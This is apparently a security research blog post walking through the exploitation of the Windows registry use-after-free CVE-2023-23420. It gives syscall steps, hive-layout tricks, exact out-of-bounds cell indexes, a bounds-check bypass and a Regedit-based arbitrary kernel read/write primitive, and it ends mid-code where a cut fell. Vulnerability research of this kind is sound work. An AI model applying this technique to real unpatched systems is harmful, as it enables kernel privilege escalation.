    This brings us to the second vulnerability, CVE-2023-23420. This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell. It was caused by certain issues in the transactional key rename operation. These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations.

    In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to. This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that's what we'll do. Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it's nothing we can't handle. So let's get to work!

    Step 1: Abusing the UAF to establish dynamically-controlled value cells

    Let's start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn't much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we'll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout:

    At the top left, a box labeled "Exploit" is designated as a "Key node," with a dotted line extending upwards from its "Key node" label. An arrow from "Exploit" points to a box labeled "TmpKeyName," also designated as a "Key node." From "TmpKeyName," two arrows point downwards to two separate "Key node" boxes: "SubKey1" and "SubKey2." Another arrow extends to the right from "TmpKeyName" to a vertically stacked group of four rectangular elements, collectively referred to as a "Value list" via a label to their left. From this "Value list," four separate arrows point to the right, each connecting to a distinct container box. Each of these container boxes has a "Value node" label above it: The first container is "FakeKeyContainer." The second is "ValueListContainer." The third is "KernelAddrContainer." The fourth is "KernelDataContainer."

    At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create. Below it, we have the "TmpKeyName" key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty). Second, this is the key on which we will perform the "rename" operation, which is the basis of the CVE-2023-23420 vulnerability. Below it are two more keys, "SubKey1" and "SubKey2", which are also needed in the exploitation process for transactional deletion, each through a different view of their parent.

    Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section "Operating on subkeys of transactionally renamed keys", and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps:

    1. Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.
    2. Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.
    3. Performing a transactional rename operation on one of these handles, changing the name to "Scratchpad".
    4. Transactionally deleting the "SubKey1" and "SubKey2" keys, each through a different parent handle (one renamed, the other not).
    5. Committing the entire transaction by calling the NtCommitRegistryTransaction syscall.

    After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly:

    At the top left, a box labeled "Exploit" is designated as a "Key node," with a dotted line extending upwards from its "Key node" label. An arrow from "Exploit" points to a box labeled "Scratchpad," also designated as a "Key node." From "Scratchpad," a red arrow points downwards to a dashed-outline box labeled "Free." Another arrow extends to the right from "Scratchpad" to a vertically stacked group of four rectangular elements, collectively referred to as a "Value list" via a label to their left. From this "Value list," four separate arrows point to the right, each connecting to a distinct container box. Each of these container boxes has a "Value node" label above it: The first container is "FakeKeyContainer." The second is "ValueListContainer." The third is "KernelAddrContainer." The fourth is "KernelDataContainer."

    We see that the "TmpKeyName" key has been renamed to "Scratchpad", and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent's subkey list. At this point, we want to use the four values of the "Scratchpad" key to create our own fake data structure. According to it, the freed subkey will still appear to exist, containing two values named "KernelAddr" and "KernelData". Each of the "Container" values is responsible for imitating one type of object, and the most crucial role is played by the "FakeKeyContainer" value. Its backing buffer must perfectly align with the memory previously associated with the "SubKey1" key node. The diagram below illustrates the desired outcome:

    A diagram illustrates a complex data structure and flow, likely related to a system exploit. At the top left, a box labeled "Exploit," designated as a "Key node" with a dotted line extending upwards, points to a box labeled "Scratchpad," also a "Key node." "Scratchpad" points to the right to a vertically stacked group of four rectangular elements, labeled "Value list." This "Value list" has four arrows pointing to four "Value node" container boxes on the far right: "FakeKeyContainer," "ValueListContainer," "KernelAddrContainer," and "KernelDataContainer." An arrow extends downwards and to the right from "Scratchpad" to a box labeled "FakeKey," which is also designated as "Data cell / fake key node." From "FakeKey," an arrow points right to a stack of two horizontal elements labeled "Data cell / fake value list," and another thin arrow points upwards and right to "FakeKeyContainer." From the "Data cell / fake value list," its top element has an arrow pointing right to "KernelAddr" (labeled "Data cell / fake value node"), and its bottom element has an arrow pointing downwards and right to "KernelData" (labeled "Data cell / fake value node"). "KernelAddr" has a thin arrow pointing upwards and right to "KernelAddrContainer." "KernelData" has a thin arrow pointing upwards and right to "KernelDataContainer." A wavy line connects the right side of "KernelAddrContainer" to the left side of "KernelDataContainer," and another wavy line extends from the right side of "KernelDataContainer" off to the right.

    All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the "FakeKey" using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values. In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps:

    1. Writing to the "FakeKeyContainer" value with an initial, basic representation of the "FakeKey" key. At this stage, it is not important that the key node is entirely correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the "Scratchpad" key.
    2. Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.
    3. Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the "ValueListContainer", "KernelAddrContainer" and "KernelDataContainer" values, as well as a cell index of a valid security descriptor. This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the "FakeKey" to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, ... in subsequent loop iterations. This enables a kind of "arbitrary hive read" primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the "Scratchpad" key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey. This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.
    4. Using the above information to set the correct data for each of the four cells: the key node of the "FakeKey" key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of "KernelAddr" and "KernelData". This makes "FakeKey" a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us.
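    For illustration, the probe indexes used by the info-leak loop in step 3 can be generated with a trivial helper (the function name is mine, invented for this sketch, and not part of any real API):

    ```python
    PAGE_SIZE = 0x1000
    VOLATILE = 1 << 31  # bit 31 of a cell index selects the volatile storage type

    def scan_indexes(num_pages):
        """Yield the Class cell indexes probed in subsequent loop iterations:
        0x80000000, 0x80001000, 0x80002000, ... one per volatile hive page.
        Each probe leaks up to 0xFFC bytes of that page via the fake key's
        Class field, as returned by NtEnumerateKey(KeyNodeInformation)."""
        for page in range(num_pages):
            yield VOLATILE | (page * PAGE_SIZE)

    print([hex(i) for i in scan_indexes(3)])
    # ['0x80000000', '0x80001000', '0x80002000']
    ```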

    If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress. An example from my test system is shown in the screenshot below. The extra "Filler" value is used to fill the space occupied by the old "TmpKeyName" key node freed during the rename operation. This is necessary so that the data of the "FakeKeyContainer" value correctly aligns with the freed cell of the "SubKey1" key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity.

    Example successful exploit

    Step 2: Getting read/write access to the CMHIVE kernel object

    Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents. Let's say that we set the type of the "KernelData" value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive's _CMHIVE structure on the kernel pool. If we do this, and then browse to the "FakeKey" key in the Registry Editor, we will encounter an unpleasant surprise:

    Bluescreen!

    This is definitely not the result we expected, and something must have gone wrong. If we investigate the system crash in WinDbg, we will get the following information:

    Break instruction exception - code 80000003 (first chance)

    A fatal system error has occurred.

    Debugger entered on first try; Bugcheck callbacks have not been invoked.

    A fatal system error has occurred.

    nt!DbgBreakPointWithStatus:

    fffff800`8061ff20 cc              int     3

    0: kd> !analyze -v

    *******************************************************************************

    *                                                                             *

    *                        Bugcheck Analysis                                    *

    *                                                                             *

    *******************************************************************************

    REGISTRY_ERROR (51)

    Something has gone badly wrong with the registry.  If a kernel debugger

    is available, get a stack trace. It can also indicate that the registry got

    an I/O error while trying to read one of its files, so it can be caused by

    hardware problems or filesystem corruption.

    It may occur due to a failure in a refresh operation, which is used only

    in by the security system, and then only when resource limits are encountered.

    Arguments:

    Arg1: 0000000000000001, (reserved)

    Arg2: ffffd4855dc36000, (reserved)

    Arg3: 00000000b2603000, depends on where Windows BugChecked, may be pointer to hive

    Arg4: 000000000000025d, depends on where Windows BugChecked, may be return code of

            HvCheckHive if the hive is corrupt.

    [...]

    0: kd> k

     # Child-SP          RetAddr               Call Site

    00 ffff828b`b100be68 fffff800`80763642     nt!DbgBreakPointWithStatus

    01 ffff828b`b100be70 fffff800`80762e81     nt!KiBugCheckDebugBreak+0x12

    02 ffff828b`b100bed0 fffff800`80617957     nt!KeBugCheck2+0xa71

    03 ffff828b`b100c640 fffff800`80a874d5     nt!KeBugCheckEx+0x107

    04 ffff828b`b100c680 fffff800`8089dfd5     nt!HvpReleaseCellPaged+0x1ec1a5

    05 ffff828b`b100c6c0 fffff800`808a29be     nt!CmpQueryKeyValueData+0x1a5

    06 ffff828b`b100c770 fffff800`808a264e     nt!CmEnumerateValueKey+0x13e

    07 ffff828b`b100c840 fffff800`80629e75     nt!NtEnumerateValueKey+0x31e

    08 ffff828b`b100ca70 00007ff8`242c4114     nt!KiSystemServiceCopyEnd+0x25

    09 00000008`c747dc38 00000000`00000000     0x00007ff8`242c4114

    We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access. Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven't really mentioned so far in this blog post series.

    To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:

      _HV_GET_CELL_CONTEXT Context;

      //

      // Translate the cell index to virtual address

      //

      PVOID CellAddress = Hive->GetCellRoutine(Hive, CellIndex, &Context);

      //

      // Operate on the cell view using the CellAddress pointer

      //

      ...

      //

      // Release the cell

      //

      Hive->ReleaseCellRoutine(Hive, &Context)

    There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it. We are already familiar with the first two, and they are both obvious, but what is the release about? Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was used not only to translate cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls.

    The presence or absence of the "release" function in consecutive Windows versions is shown below:

    • Windows NT 3.1 – 2000: ❌
    • Windows XP – 7: ✅
    • Windows 8 – 8.1: ❌
    • Windows 10 – 11: ✅

    Let's take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x:

    VOID HvpReleaseCellPaged(_CMHIVE *CmHive, _HV_GET_CELL_CONTEXT *Context) {

      _HCELL_INDEX RealCell;

      _HMAP_ENTRY *MapEntry;

      RealCell = Context->Cell & 0xFFFFFFFE;

      MapEntry = HvpGetCellMap(&CmHive->Hive, RealCell);

      if (MapEntry == NULL) {

        KeBugCheckEx(REGISTRY_ERROR, 1, CmHive, RealCell, 0x291);

      }

      if ((Context->Cell & 1) != 0) {

        HvpMapEntryReleaseBinAddress(MapEntry);

      }

      HvpGetCellContextReinitialize(Context);

    }

    _HMAP_ENTRY *HvpGetCellMap(_HHIVE *Hive, _HCELL_INDEX CellIndex) {

      DWORD StorageType = CellIndex >> 31;

      DWORD StorageIndex = CellIndex & 0x7FFFFFFF;

      if (StorageIndex < Hive->Storage[StorageType].Length) {

        return &Hive->Storage[StorageType].Map

                                         ->Directory[(CellIndex >> 21) & 0x3FF]

                                         ->Table[(CellIndex >> 12) & 0x1FF];

      } else {

        return NULL;

      }

    }

    VOID HvpMapEntryReleaseBinAddress(_HMAP_ENTRY *MapEntry) {

      ExReleaseRundownProtection(&MapEntry->TemporaryBinRundown);

    }

    VOID HvpGetCellContextReinitialize(_HV_GET_CELL_CONTEXT *Context) {

      Context->Cell = -1;

      Context->Hive = NULL;

    }

As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRundown field. This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object. An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered.
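The index decomposition performed by HvpGetCellMap can be mirrored in a few lines of Python. The field widths below are taken directly from the shifts and masks in the decompiled code above; this is an illustrative sketch, not production tooling:

```python
def decompose_cell_index(index):
    """Split a 32-bit cell index the same way HvpGetCellMap does:
    1 storage-type bit, 10 directory bits, 9 table bits, 12 offset bits."""
    return {
        "storage_type": index >> 31,          # 0 = stable, 1 = volatile
        "directory": (index >> 21) & 0x3FF,   # index into Map->Directory
        "table": (index >> 12) & 0x1FF,       # index into Directory[i]->Table
        "offset": index & 0xFFF,              # byte offset within the block
    }

# The OOB index used later in this post (0xB2603390 - 4) decomposes into the
# same Type/Table/Block/Offset values reported by the !reg cellindex command:
parts = decompose_cell_index(0xB260338C)
assert parts == {"storage_type": 1, "directory": 0x193, "table": 3, "offset": 0x38C}
```

Note that the WinDbg `!reg cellindex` output labels the directory index "Table" and the table index "Block", which is why the names differ between the two views.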

    This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged. This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form:

    VOID HvpReleaseCellPaged(_HHIVE *Hive, _HV_GET_CELL_CONTEXT *Context) {

      _HCELL_INDEX Cell = Context->Cell;

      DWORD StorageIndex = Cell & 0x7FFFFFFF;

      DWORD StorageType = Cell >> 31;

      if (StorageIndex >= Hive->Storage[StorageType].Length ||

          &Hive->Storage[StorageType].Map->Directory[(Cell >> 21) & 0x3FF]->Table[(Cell >> 12) & 0x1FF] == NULL) {

        KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);

      }

      Context->Cell = -1;

      Context->BinContext = 0;

    }

    The bounds check on the cell index is clearly still present, but it doesn't serve any real purpose. Based on this, we can assume that this is more likely a historical relic rather than a mitigation deliberately added by the developers. Still, it interferes with our carefully crafted exploitation technique. Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead?

    As it turns out, not necessarily. Indeed, if the bounds check was located in the HvpGetCellPaged function, there wouldn't be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea's usefulness. However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call. In many ways, this sounds like a "pwn" task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation. Let's take another look at the if statement that stands in our way:

    if (StorageIndex >= Hive->Storage[StorageType].Length || /* ... */) {

      KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);

    }

    The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure. On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage:

    0: kd> dx (&((_HHIVE*)0)->Storage[0].Length)

    (&((_HHIVE*)0)->Storage[0].Length)                 : 0x118

    0: kd> dx (&((_HHIVE*)0)->Storage[1].Length)

    (&((_HHIVE*)0)->Storage[1].Length)                 : 0x390

    As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure. By adding one of the offsets above, we can obtain an index that points directly to the Length field. Let's test this in practice:

    0: kd> dx (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length) 

    (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)                  : 0xffff810713f82390

    0: kd> !reg cellindex 0xffff810713f82000 0xB2603390-4

    Map = ffff810713f823a0 Type = 1 Table = 193 Block = 3 Offset = 38c

    MapTable     = ffff810713debe90 

    MapEntry     = ffff810713debed8 

    BinAddress = ffff810713f82000, BlockOffset = 0000000000000000

    BlockAddress = ffff810713f82000 

    pcell:  ffff810713f82390

    So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive. This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps:

    1. Crafting a controlled registry value with a data index of 0xB260338C.
    2. Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.
    3. During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted. As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.
    4. Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability.
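The index used in step 1 follows from simple arithmetic over values already shown above; a quick sketch:

```python
HIVE_BASE_INDEX = 0xB2603000    # OOB cell index resolving to the _CMHIVE base
VOLATILE_LENGTH_OFFSET = 0x390  # _HHIVE.Storage[1].Length on the tested build

# The first four bytes of a cell are treated as its size and HvpGetCellPaged
# skips them (+4), so the data index must point 4 bytes before the target:
length_field_index = HIVE_BASE_INDEX + VOLATILE_LENGTH_OFFSET - 4
assert length_field_index == 0xB260338C
```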

    To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place.

Disassembly output

    The technique works by a hair's breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future.

    For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before. This prevents the kernel from crashing due to the unexpectedly large hive length. Specifically, the flags are (as named in blog post #6):

    • HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree function.
    • HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path.

Of course, these are just conclusions drawn from writing a demonstration exploit, so I don't guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should finally be able to see the following result in the Registry Editor:

    Result in registry editor

    It is easy to verify that this is indeed a "live view" into the _CMHIVE structure in kernel memory:

    0: kd> dt _HHIVE ffff810713f82000

    nt!_HHIVE

       +0x000 Signature        : 0xbee0bee0

       +0x008 GetCellRoutine   : 0xfffff801`8049b370     _CELL_DATA*  nt!HvpGetCellPaged+0

       +0x010 ReleaseCellRoutine : 0xfffff801`8049b330     void  nt!HvpReleaseCellPaged+0

       +0x018 Allocate         : 0xfffff801`804cae30     void*  nt!CmpAllocate+0

       +0x020 Free             : 0xfffff801`804c9100     void  nt!CmpFree+0

       +0x028 FileWrite        : 0xfffff801`80595e00     long  nt!CmpFileWrite+0

       +0x030 FileRead         : 0xfffff801`805336a0     long  nt!CmpFileRead+0

       +0x038 HiveLoadFailure  : (null)

       +0x040 BaseBlock        : 0xffff8107`13f9a000 _HBASE_BLOCK

    [...]

    Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes. Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data. We are getting very close to our goal!

    Step 3: Getting arbitrary read/write access to the entire kernel address space

    At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how, with these capabilities, to execute our own payload in kernel-mode or otherwise elevate our process's privileges in the system. What may immediately come to mind based on the layout of the _CMHIVE / _HHIVE structure is the idea of overwriting one of the function pointers located at the beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and in the few cases where they are still used directly, the Control Flow Guard mitigation is enabled. Perhaps something could be ultimately worked out to bypass CFG, but with the primitives currently available to us, I decided that this sounds more difficult than it should be.

    If not that, then what else? Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process. However, I had a specific goal in mind that I wanted to achieve from the start. I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit. This brings us back to the selection of our two fake values, "KernelAddr" and "KernelData". My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically—based solely on how the registry works—contain the data from that address, available for both reading and writing. This would enable a very unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation—something that doesn't happen very often. 🙂

    The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism. In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk. Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr.

    In practice, this can be achieved as follows: KernelAddr will function similarly as before, pointing to an offset within _CMHIVE using a series of pointer dereferences:

    • _CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU).
    • _CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives.

    For KernelData, we can use any self-referencing pointer in the first step of the cell walk. These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list.
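The reason such pointers are plentiful is that InitializeListHead sets both Flink and Blink of an empty LIST_ENTRY to the address of the list head itself. A toy flat-memory model makes this easy to picture (the "address" used here is just the structure offset from the post, not a real kernel pointer):

```python
memory = {}  # toy flat model: address -> 64-bit value

def initialize_list_head(head):
    """Model of InitializeListHead: an empty list's Flink and Blink
    both point back at the head itself."""
    memory[head] = head      # Flink
    memory[head + 8] = head  # Blink

# _CMHIVE.SecurityHash[3].Flink at offset 0x798 is such an empty list head:
initialize_list_head(0x798)
assert memory[0x798] == 0x798  # dereferencing it yields its own address
```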

    The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan. Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???. The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object. This should be a 0x18 byte area that is generally unused and located after a self-referencing pointer. For demonstration purposes, I used offset 0xB70, which corresponds to the following fields:

_CMHIVE layout                                         _HMAP_ENTRY layout

+0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT          +0x000 BlockOffset         : Uint8B

+0xb78 RootKcb          : Ptr64 _CM_KEY_CONTROL_BLOCK  +0x008 PermanentBinAddress : Uint8B

+0xb80 Frozen           : UChar                        +0x010 MemAlloc            : Uint4B
    On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure. The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 - 0x4 = 0xB2603B6C. If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number.

    As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer. To calculate the directory index value, we need to subtract it from the offset of _CMHIVE.Hive.Storage[1].SmallDir and then divide by 8, which gives us: (0x798 - 0x3A0) ÷ 8 = 0x7F. Next, we will calculate the table index by subtracting the offset of the fake _HMAP_ENTRY structure from the offset of the self-referencing pointer and then dividing the result by the size of _HMAP_ENTRY: (0xB70 - 0x798) ÷ 0x18 = 0x29. If we assume that the 12-bit offset part is zero (we don't want to add any offsets at this point), then we have all the elements needed to compose the full cell index. We will use the MakeCellIndex helper function defined earlier for this purpose:

    >>> MakeCellIndex(1, 0x7F, 0x29, 0)

    0x8fe29000
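MakeCellIndex was defined in an earlier post in this series; for readers without it at hand, a reconstruction consistent with the output above (assuming the 1-bit storage type / 10-bit directory / 9-bit table / 12-bit offset layout) is:

```python
def MakeCellIndex(storage_type, directory, table, offset):
    # Inverse of the decomposition performed by HvpGetCellMap.
    return (storage_type << 31) | (directory << 21) | (table << 12) | offset

assert MakeCellIndex(1, 0x7F, 0x29, 0) == 0x8FE29000
assert MakeCellIndex(1, 0x193, 0x3, 0x38C) == 0xB260338C  # the Length-field index
```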

    So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction. This is illustrated in the diagram below:

    Diagram described below

    The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left. The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers. As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved.

    We could end this section right here, but there is one more minor issue I'd like to mention. As you may recall, the HvpGetCellPaged function ends with the following statement:

    return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4;

    Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra "+4". Normally, this skips the cell size and directly returns a pointer to the cell's data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn't a huge issue in practical terms, but it doesn't look perfect in a demonstration.

    So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations:

    • The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.
    • The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can't subtract anything.

    However, we can combine both of them together to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit representation) and the cell offset to 0xC, their sum will be -4, which will mutually reduce with the unconditionally added +4, causing the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let's dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg:

    0: kd> ? nt

    Evaluate expression: -8781857554432 = fffff803`50800000

    0: kd> db /c8 fffff803`50800004

    fffff803`50800004  03 00 00 00 04 00 00 00  ........

    fffff803`5080000c  ff ff 00 00 b8 00 00 00  ........

    fffff803`50800014  00 00 00 00 40 00 00 00  ....@...

    fffff803`5080001c  00 00 00 00 00 00 00 00  ........

    fffff803`50800024  00 00 00 00 00 00 00 00  ........

    fffff803`5080002c  00 00 00 00 00 00 00 00  ........

    fffff803`50800034  00 00 00 00 00 00 00 00  ........

    fffff803`5080003c  10 01 00 00 0e 1f ba 0e  ........

    fffff803`50800044  00 b4 09 cd 21 b8 01 4c  ....!..L

    fffff803`5080004c  cd 21 54 68 69 73 20 70  .!This p

    fffff803`50800054  72 6f 67 72 61 6d 20 63  rogram c

    fffff803`5080005c  61 6e 6e 6f 74 20 62 65  annot be

    And then let's browse to the same address using our FakeKey in Regedit:

    Fake key in registry editor

    The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected "MZ" signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can "peek" at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn't any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC.
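This 4-byte bias, and the way the exploit cancels it, can be double-checked against the return expression of HvpGetCellPaged quoted earlier; a small Python model (with 64-bit wraparound):

```python
MASK64 = (1 << 64) - 1

def hvp_get_cell_paged_result(permanent_bin_address, block_offset, index):
    # Models: (Entry->PermanentBinAddress & ~0xF) + Entry->BlockOffset
    #         + (Index & 0xFFF) + 4
    return ((permanent_bin_address & ~0xF) + block_offset
            + (index & 0xFFF) + 4) & MASK64

# PermanentBinAddress = -0x10 plus a cell offset of 0xC sum to -4, which
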